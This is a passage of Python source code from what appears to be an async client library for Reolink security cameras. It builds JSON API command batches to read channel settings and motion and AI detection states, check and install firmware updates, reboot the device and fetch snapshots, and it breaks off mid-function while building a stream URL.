channel}}]\n elif cmd == \"GetRtspUrl\":\n ch_body = [{\"cmd\": \"GetRtspUrl\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n for channel in self._channels:\n ch_body = []\n if cmd == \"GetIsp\":\n ch_body = [{\"cmd\": \"GetIsp\", \"action\": 0, \"param\": {\"channel\": channel}}]\n\n if channel > 0 and self.model in DUAL_LENS_DUAL_MOTION_MODELS:\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n continue\n\n if cmd == \"GetIrLights\":\n ch_body = [{\"cmd\": \"GetIrLights\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPowerLed\":\n ch_body = [{\"cmd\": \"GetPowerLed\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetWhiteLed\":\n ch_body = [{\"cmd\": \"GetWhiteLed\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzPreset\":\n ch_body = [{\"cmd\": \"GetPtzPreset\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetAutoFocus\":\n ch_body = [{\"cmd\": \"GetAutoFocus\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetZoomFocus\":\n ch_body = [{\"cmd\": \"GetZoomFocus\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzGuard\":\n ch_body = [{\"cmd\": \"GetPtzGuard\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzCurPos\":\n ch_body = [{\"cmd\": \"GetPtzCurPos\", \"action\": 0, \"param\": {\"PtzCurPos\": {\"channel\": channel}}}]\n elif cmd == \"GetAiCfg\":\n ch_body = [{\"cmd\": \"GetAiCfg\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetPtzTraceSection\":\n ch_body = [{\"cmd\": \"GetPtzTraceSection\", \"action\": 0, \"param\": {\"PtzTraceSection\": {\"channel\": channel}}}]\n elif cmd == \"GetAudioCfg\":\n ch_body = [{\"cmd\": \"GetAudioCfg\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetAudioFileList\":\n ch_body = [{\"cmd\": \"GetAudioFileList\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetAutoReply\":\n ch_body = [{\"cmd\": \"GetAutoReply\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetOsd\":\n ch_body = [{\"cmd\": \"GetOsd\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd == \"GetBuzzerAlarmV20\":\n ch_body = [{\"cmd\": \"GetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetAlarm\", \"GetMdAlarm\"]:\n if self.api_version(\"GetMdAlarm\") >= 1:\n ch_body = [{\"cmd\": \"GetMdAlarm\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetAlarm\", \"action\": 0, \"param\": {\"Alarm\": {\"channel\": channel, \"type\": \"md\"}}}]\n elif cmd == \"GetAiAlarm\":\n ch_body = []\n for ai_type in self.ai_supported_types(channel):\n ch_body.append({\"cmd\": \"GetAiAlarm\", \"action\": 0, \"param\": {\"channel\": channel, \"ai_type\": ai_type}})\n elif cmd in [\"GetEmail\", \"GetEmailV20\"]:\n if self.api_version(\"GetEmail\") >= 1:\n ch_body = [{\"cmd\": \"GetEmailV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetEmail\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetPush\", \"GetPushV20\"]:\n if self.api_version(\"GetPush\") >= 1:\n ch_body = [{\"cmd\": \"GetPushV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetPush\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetFtp\", \"GetFtpV20\"]:\n if self.api_version(\"GetFtp\") >= 1:\n ch_body = [{\"cmd\": \"GetFtpV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetFtp\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetRec\", \"GetRecV20\"]:\n if self.api_version(\"GetRec\") >= 1:\n ch_body = [{\"cmd\": \"GetRecV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetRec\", \"action\": 0, \"param\": {\"channel\": channel}}]\n elif cmd in [\"GetAudioAlarm\", \"GetAudioAlarmV20\"]:\n if self.api_version(\"GetAudioAlarm\") >= 1:\n ch_body = [{\"cmd\": \"GetAudioAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetAudioAlarm\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not channels:\n if cmd == \"Getchannelstatus\":\n body = [{\"cmd\": \"Getchannelstatus\"}]\n elif cmd == \"GetDevInfo\":\n body = [{\"cmd\": \"GetDevInfo\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetLocalLink\":\n body = [{\"cmd\": \"GetLocalLink\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetWifiSignal\":\n body = [{\"cmd\": \"GetWifiSignal\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetNetPort\":\n body = [{\"cmd\": \"GetNetPort\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetHddInfo\":\n body = [{\"cmd\": \"GetHddInfo\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetUser\":\n body = [{\"cmd\": \"GetUser\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetNtp\":\n body = [{\"cmd\": \"GetNtp\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetTime\":\n body = [{\"cmd\": \"GetTime\", \"action\": 0, \"param\": {}}]\n elif cmd == \"GetAbility\":\n body = [{\"cmd\": \"GetAbility\", \"action\": 0, \"param\": {\"User\": {\"userName\": self._username}}}]\n\n if body:\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"get_state cmd '{body[0]['cmd']}': {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining get_state response for cmd '{body[0]['cmd']}'\") from err\n\n if channels:\n self.map_channels_json_response(json_data, channels)\n else:\n self.map_host_json_response(json_data)\n\n return\n\n async def get_states(self) -> None:\n body = []\n channels = []\n for channel in self._stream_channels:\n ch_body = [{\"cmd\": \"GetEnc\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n for channel in self._channels:\n ch_body = [{\"cmd\": \"GetIsp\", \"action\": 0, \"param\": {\"channel\": channel}}]\n if self.api_version(\"GetEvents\") >= 1:\n ch_body.append({\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}})\n if self.ai_supported(channel):\n ch_body.append({\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ir_lights\"):\n ch_body.append({\"cmd\": \"GetIrLights\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"floodLight\"):\n ch_body.append({\"cmd\": \"GetWhiteLed\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"status_led\"):\n ch_body.append({\"cmd\": \"GetPowerLed\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"zoom\"):\n ch_body.append({\"cmd\": \"GetZoomFocus\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"auto_focus\"):\n ch_body.append({\"cmd\": \"GetAutoFocus\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ptz_guard\"):\n ch_body.append({\"cmd\": \"GetPtzGuard\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ptz_position\"):\n ch_body.append({\"cmd\": \"GetPtzCurPos\", \"action\": 0, \"param\": {\"PtzCurPos\": {\"channel\": channel}}})\n\n if self.supported(channel, \"auto_track\"):\n ch_body.append({\"cmd\": \"GetAiCfg\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"auto_track_limit\"):\n ch_body.append({\"cmd\": \"GetPtzTraceSection\", \"action\": 0, \"param\": {\"PtzTraceSection\": {\"channel\": channel}}})\n\n if self.supported(channel, \"volume\"):\n ch_body.append({\"cmd\": \"GetAudioCfg\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"quick_reply\"):\n ch_body.append({\"cmd\": \"GetAutoReply\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"buzzer\"):\n ch_body.append({\"cmd\": \"GetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"email\"):\n if self.api_version(\"GetEmail\") >= 1:\n ch_body.append({\"cmd\": \"GetEmailV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetEmail\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"push\"):\n if self.api_version(\"GetPush\") >= 1:\n ch_body.append({\"cmd\": \"GetPushV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetPush\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"ftp\"):\n if self.api_version(\"GetFtp\") >= 1:\n ch_body.append({\"cmd\": \"GetFtpV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetFtp\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"recording\"):\n if self.api_version(\"GetRec\") >= 1:\n ch_body.append({\"cmd\": \"GetRecV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetRec\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"siren\"):\n if self.api_version(\"GetAudioAlarm\") >= 1:\n ch_body.append({\"cmd\": \"GetAudioAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetAudioAlarm\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n if self.supported(channel, \"md_sensitivity\"):\n if self.api_version(\"GetMdAlarm\") >= 1:\n ch_body.append({\"cmd\": \"GetMdAlarm\", \"action\": 0, \"param\": {\"channel\": channel}})\n else:\n ch_body.append({\"cmd\": \"GetAlarm\", \"action\": 0, \"param\": {\"Alarm\": {\"channel\": channel, \"type\": \"md\"}}})\n\n if self.supported(channel, \"ai_sensitivity\"):\n for ai_type in self.ai_supported_types(channel):\n ch_body.append({\"cmd\": \"GetAiAlarm\", \"action\": 0, \"param\": {\"channel\": channel, \"ai_type\": ai_type}})\n\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n # host states\n host_body = []\n if self.supported(None, \"wifi\") and self.wifi_connection:\n host_body.append({\"cmd\": \"GetWifiSignal\", \"action\": 0, \"param\": {}})\n\n body.extend(host_body)\n channels.extend([-1] * len(host_body))\n\n if not body:\n _LOGGER.debug(\n \"Host %s:%s: get_states, no channels connected so skipping request.\",\n self._host,\n self._port,\n )\n return\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"channel-state: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining channel-state response\") from err\n\n self.map_channels_json_response(json_data, channels)\n\n async def get_host_data(self) -> None:\n \"\"\"Fetch the host settings/capabilities.\"\"\"\n body: typings.reolink_json = [\n {\"cmd\": \"Getchannelstatus\"},\n {\"cmd\": \"GetDevInfo\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetLocalLink\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetNetPort\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetHddInfo\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetUser\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetNtp\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetTime\", \"action\": 0, \"param\": {}},\n {\"cmd\": \"GetAbility\", \"action\": 0, \"param\": {\"User\": {\"userName\": self._username}}},\n ]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Get host-settings error: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: returned no data when obtaining host-settings\") from err\n\n self.map_host_json_response(json_data)\n self.construct_capabilities(warnings=False)\n\n if self.model in DUAL_LENS_SINGLE_MOTION_MODELS or (not self.is_nvr and self.api_version(\"supportAutoTrackStream\", 0) > 0):\n self._stream_channels = [0, 1]\n self._nvr_num_channels = 1\n self._channels = [0]\n else:\n self._stream_channels = self._channels\n\n body = []\n channels = []\n for channel in self._stream_channels:\n ch_body = [\n {\"cmd\": \"GetEnc\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetRtspUrl\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n for channel in self._channels:\n ch_body = [\n {\"cmd\": \"GetChnTypeInfo\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}}, # to capture AI capabilities\n {\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetIsp\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n\n if channel > 0 and self.model in DUAL_LENS_DUAL_MOTION_MODELS:\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n continue\n\n ch_body.extend(\n [\n {\"cmd\": \"GetWhiteLed\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetIrLights\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAudioCfg\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n )\n # one time values\n ch_body.append({\"cmd\": \"GetOsd\", \"action\": 0, \"param\": {\"channel\": channel}})\n if self.supported(channel, \"quick_reply\"):\n ch_body.append({\"cmd\": \"GetAudioFileList\", \"action\": 0, \"param\": {\"channel\": channel}})\n # checking range\n if self.supported(channel, \"zoom_basic\"):\n ch_body.append({\"cmd\": \"GetZoomFocus\", \"action\": 1, \"param\": {\"channel\": channel}})\n if self.supported(channel, \"pan_tilt\") and self.api_version(\"ptzPreset\", channel) >= 1:\n ch_body.append({\"cmd\": \"GetPtzPreset\", \"action\": 0, \"param\": {\"channel\": channel}})\n ch_body.append({\"cmd\": \"GetPtzGuard\", \"action\": 0, \"param\": {\"channel\": channel}})\n ch_body.append({\"cmd\": \"GetPtzCurPos\", \"action\": 0, \"param\": {\"PtzCurPos\": {\"channel\": channel}}})\n if self.supported(channel, \"auto_track\"):\n ch_body.append({\"cmd\": \"GetAiCfg\", \"action\": 1, \"param\": {\"channel\": channel}})\n # checking API versions\n if self.api_version(\"supportBuzzer\") > 0:\n ch_body.append({\"cmd\": \"GetBuzzerAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}})\n if self.api_version(\"scheduleVersion\") >= 1:\n ch_body.extend(\n [\n {\"cmd\": \"GetEmailV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetPushV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetFtpV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetRecV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAudioAlarmV20\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetMdAlarm\", \"action\": 0, \"param\": {\"channel\": channel}},\n ]\n )\n else:\n ch_body.extend(\n [\n {\"cmd\": \"GetEmail\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetPush\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetFtp\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetRec\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAudioAlarm\", \"action\": 0, \"param\": {\"channel\": channel}},\n {\"cmd\": \"GetAlarm\", \"action\": 0, \"param\": {\"Alarm\": {\"channel\": channel, \"type\": \"md\"}}},\n ]\n )\n\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not body:\n _LOGGER.debug(\n \"Host %s:%s: get_host_data, no channels connected so skipping channel specific requests.\",\n self._host,\n self._port,\n )\n return\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Channel-settings: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: returned no data when obtaining initial channel-settings\") from err\n\n self.map_channels_json_response(json_data, channels)\n\n # Let's assume all channels of an NVR or multichannel-camera always have the same versions of commands... Not sure though...\n def check_command_exists(cmd: str) -> int:\n for x in json_data:\n if x[\"cmd\"] == cmd:\n return 1\n return 0\n\n self._api_version[\"GetEvents\"] = check_command_exists(\"GetEvents\")\n self._api_version[\"GetWhiteLed\"] = check_command_exists(\"GetWhiteLed\")\n self._api_version[\"GetAudioCfg\"] = check_command_exists(\"GetAudioCfg\")\n self._api_version[\"GetPtzGuard\"] = check_command_exists(\"GetPtzGuard\")\n self._api_version[\"GetPtzCurPos\"] = check_command_exists(\"GetPtzCurPos\")\n if self.api_version(\"scheduleVersion\") >= 1:\n self._api_version[\"GetEmail\"] = check_command_exists(\"GetEmailV20\")\n self._api_version[\"GetPush\"] = check_command_exists(\"GetPushV20\")\n self._api_version[\"GetFtp\"] = check_command_exists(\"GetFtpV20\")\n self._api_version[\"GetRec\"] = check_command_exists(\"GetRecV20\")\n self._api_version[\"GetAudioAlarm\"] = check_command_exists(\"GetAudioAlarmV20\")\n self._api_version[\"GetMdAlarm\"] = check_command_exists(\"GetMdAlarm\")\n else:\n self._api_version[\"GetEmail\"] = 0\n self._api_version[\"GetPush\"] = 0\n self._api_version[\"GetFtp\"] = 0\n self._api_version[\"GetRec\"] = 0\n self._api_version[\"GetAudioAlarm\"] = 0\n self._api_version[\"GetMdAlarm\"] = 0\n\n self.construct_capabilities()\n\n async def get_motion_state(self, channel: int) -> Optional[bool]:\n if channel not in self._channels:\n return None\n\n body = [{\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError:\n _LOGGER.error(\n \"Host %s:%s: error translating motion detection state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining motion state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n return False\n\n self.map_channel_json_response(json_data, channel)\n\n return None if channel not in self._motion_detection_states else self._motion_detection_states[channel]\n\n async def get_ai_state(self, channel: int) -> Optional[dict[str, bool]]:\n if channel not in self._channels:\n return None\n\n body = [{\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError:\n _LOGGER.error(\n \"Host %s:%s: error translating AI detection state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._ai_detection_states[channel] = {}\n return None\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining AI detection state response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._ai_detection_states[channel] = {}\n return None\n\n self.map_channel_json_response(json_data, channel)\n\n return (\n None\n if self._ai_detection_states is None or channel not in self._ai_detection_states or self._ai_detection_states[channel] is None\n else self._ai_detection_states[channel]\n )\n\n async def get_ai_state_all_ch(self) -> bool:\n \"\"\"Fetch Ai and visitor state all channels at once (AI + visitor).\"\"\"\n body = []\n channels = []\n for channel in self._channels:\n if self.api_version(\"GetEvents\") >= 1:\n ch_body = [{\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n if not self.ai_supported(channel):\n continue\n ch_body = [{\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not body:\n _LOGGER.warning(\n \"Host %s:%s: get_ai_state_all_ch called while none of the channels support AI detection\",\n self._host,\n self._port,\n )\n return False\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n _LOGGER.error(\n \"Host %s:%s: error translating AI states all channel response: %s\",\n self._host,\n self._port,\n str(err),\n )\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining AI states all channel response.\",\n self._host,\n self._port,\n )\n return False\n\n self.map_channels_json_response(json_data, channels)\n return True\n\n async def get_all_motion_states(self, channel: int) -> Optional[bool]:\n \"\"\"Fetch All motions states at once (regular + AI + visitor).\"\"\"\n if channel not in self._channels:\n return None\n\n if self.api_version(\"GetEvents\") >= 1:\n body = [{\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n body = [{\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n if self.ai_supported(channel):\n body.append({\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}})\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError:\n _LOGGER.error(\n \"Host %s:%s: error translating All Motion States response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining All Motion States response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n\n self.map_channel_json_response(json_data, channel)\n\n return None if channel not in self._motion_detection_states else self._motion_detection_states[channel]\n\n async def get_motion_state_all_ch(self) -> bool:\n \"\"\"Fetch All motions states of all channels at once (regular + AI + visitor).\"\"\"\n body = []\n channels = []\n for channel in self._channels:\n if self.api_version(\"GetEvents\") >= 1:\n ch_body = [{\"cmd\": \"GetEvents\", \"action\": 0, \"param\": {\"channel\": channel}}]\n else:\n ch_body = [{\"cmd\": \"GetMdState\", \"action\": 0, \"param\": {\"channel\": channel}}]\n if self.ai_supported(channel):\n ch_body.append({\"cmd\": \"GetAiState\", \"action\": 0, \"param\": {\"channel\": channel}})\n body.extend(ch_body)\n channels.extend([channel] * len(ch_body))\n\n if not body:\n _LOGGER.debug(\n \"Host %s:%s: get_motion_state_all_ch, no channels connected so skipping request.\",\n self._host,\n self._port,\n )\n return True\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n _LOGGER.error(\n \"Host %s:%s: error translating All Motion States response: %s\",\n self._host,\n self._port,\n str(err),\n )\n for channel in self._channels:\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n except NoDataError:\n _LOGGER.error(\n \"Host %s:%s: error obtaining All Motion States response.\",\n self._host,\n self._port,\n )\n for channel in self._channels:\n self._motion_detection_states[channel] = False\n self._ai_detection_states[channel] = {}\n return False\n\n self.map_channels_json_response(json_data, channels)\n return True\n\n async def _check_reolink_firmware(self) -> NewSoftwareVersion:\n \"\"\"Check for new firmware from reolink.com\"\"\"\n if self._nvr_sw_hardware_id is None or self._nvr_sw_model_id is None:\n request_URL = \"https://reolink.com/wp-json/reo-v2/download/hardware-version/selection-list\"\n json_data = await self.send_reolink_com(request_URL)\n\n for device in json_data[\"data\"]:\n if device[\"title\"] == self.hardware_version and device[\"dlProduct\"][\"title\"].startswith(self.model):\n self._nvr_sw_hardware_id = device[\"id\"]\n self._nvr_sw_model_id = device[\"dlProduct\"][\"id\"]\n break\n\n if self._nvr_sw_hardware_id is None or self._nvr_sw_model_id is None:\n raise UnexpectedDataError(f\"Could not find model '{self.model}' hardware '{self.hardware_version}' in list from reolink.com\")\n\n request_URL = f\"https://reolink.com/wp-json/reo-v2/download/firmware/?dlProductId={self._nvr_sw_model_id}&hardwareVersion={self._nvr_sw_hardware_id}&lang=en\"\n json_data = await self.send_reolink_com(request_URL)\n\n firmware_info = json_data[\"data\"][0][\"firmwares\"][0]\n hw_ver = firmware_info[\"hardwareVersion\"][0][\"title\"]\n mod_ver = firmware_info[\"hardwareVersion\"][0][\"dlProduct\"][\"title\"]\n if hw_ver != self.hardware_version or not mod_ver.startswith(self.model):\n raise UnexpectedDataError(\n f\"Hardware version of firmware info from reolink.com does not match: '{hw_ver}' != '{self.hardware_version}' or '{mod_ver}' != '{self.model}'\"\n )\n\n return NewSoftwareVersion(firmware_info[\"version\"], download_url=firmware_info[\"url\"], release_notes=firmware_info[\"new\"])\n\n async def check_new_firmware(self) -> bool | NewSoftwareVersion | str:\n \"\"\"check for new firmware using camera API, returns False if no new firmware available.\"\"\"\n new_firmware = 0\n if self.supported(None, \"update\"):\n body: typings.reolink_json = [\n {\"cmd\": \"CheckFirmware\"},\n {\"cmd\": \"GetDevInfo\", \"action\": 0, \"param\": {}},\n ]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Check firmware: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining CheckFirmware response\") from err\n\n self.map_host_json_response(json_data)\n\n try:\n new_firmware = json_data[0][\"value\"][\"newFirmware\"]\n except KeyError as err:\n raise UnexpectedDataError(f\"Host {self._host}:{self._port}: received an unexpected response from check_new_firmware: {json_data}\") from err\n\n try:\n latest_software_version = await self._check_reolink_firmware()\n except ReolinkError as err:\n _LOGGER.debug(err)\n if new_firmware == 0:\n return False\n if new_firmware == 1:\n return \"New firmware available\"\n return str(new_firmware)\n\n if self._nvr_sw_version_object is None or self._nvr_sw_version_object >= latest_software_version:\n if new_firmware == 0:\n return False\n if new_firmware == 1:\n return \"New firmware available\"\n return str(new_firmware)\n\n latest_software_version.online_update_available = new_firmware == 1\n return latest_software_version\n\n async def update_firmware(self) -> None:\n \"\"\"check for new firmware.\"\"\"\n if not self.supported(None, \"update\"):\n raise NotSupportedError(f\"update_firmware: not supported by {self.nvr_name}\")\n\n body = [{\"cmd\": \"UpgradeOnline\"}]\n await self.send_setting(body)\n\n async def update_progress(self) -> bool | int:\n \"\"\"check progress of firmware update, returns False if not in progress.\"\"\"\n if not self.supported(None, \"update\"):\n raise NotSupportedError(f\"update_progress: not supported by {self.nvr_name}\")\n\n body = [{\"cmd\": \"UpgradeStatus\"}]\n\n try:\n json_data = await self.send(body, expected_response_type=\"json\")\n except InvalidContentTypeError as err:\n raise InvalidContentTypeError(f\"Update progress: {str(err)}\") from err\n except NoDataError as err:\n raise NoDataError(f\"Host: {self._host}:{self._port}: error obtaining update progress response\") from err\n\n if json_data[0][\"code\"] != 0:\n return False\n\n return json_data[0][\"value\"][\"Status\"][\"Persent\"]\n\n async def reboot(self) -> None:\n \"\"\"Reboot the camera.\"\"\"\n if not self.supported(None, \"reboot\"):\n raise NotSupportedError(f\"Reboot: not supported by {self.nvr_name}\")\n\n body = [{\"cmd\": \"Reboot\"}]\n json_data = await self.send(body, expected_response_type=\"json\")\n\n if json_data[0][\"code\"] != 0 or json_data[0].get(\"value\", {}).get(\"rspCode\", -1) != 200:\n rspCode = json_data[0].get(\"value\", json_data[0][\"error\"])[\"rspCode\"]\n detail = json_data[0].get(\"value\", json_data[0][\"error\"]).get(\"detail\", \"\")\n raise ApiError(f\"Reboot: API returned error code {json_data[0]['code']}, response code {rspCode}/{detail}\")\n\n async def get_snapshot(self, channel: int, stream: Optional[str] = None) -> bytes | None:\n \"\"\"Get the still image.\"\"\"\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = \"main\"\n\n param: dict[str, Any] = {\"cmd\": \"Snap\", \"channel\": channel}\n\n if stream.startswith(\"autotrack_\"):\n param[\"iLogicChannel\"] = 1\n stream = stream.removeprefix(\"autotrack_\")\n\n if stream.startswith(\"snapshots_\"):\n stream = stream.removeprefix(\"snapshots_\")\n\n if stream not in [\"main\", \"sub\"]:\n stream = \"main\"\n\n param[\"snapType\"] = stream\n\n body: typings.reolink_json = [{}]\n response = await self.send(body, param, expected_response_type=\"image/jpeg\")\n if response is None or response == b\"\":\n _LOGGER.error(\n \"Host: %s:%s: error obtaining still image response for channel %s.\",\n self._host,\n self._port,\n channel,\n )\n await self.expire_session(unsubscribe=False)\n return None\n\n return response\n\n def get_flv_stream_source(self, channel: int, stream: Optional[str] = None) -> Optional[str]:\n if channel not in self._stream_channels:\n return None\n\n if stream is None:\n stream = self._stream\n\n if self._use_https:\n http_s = \"https\"\n else:\n http_s = \"http\"\n\n password = parse.quote(self._password)\n return 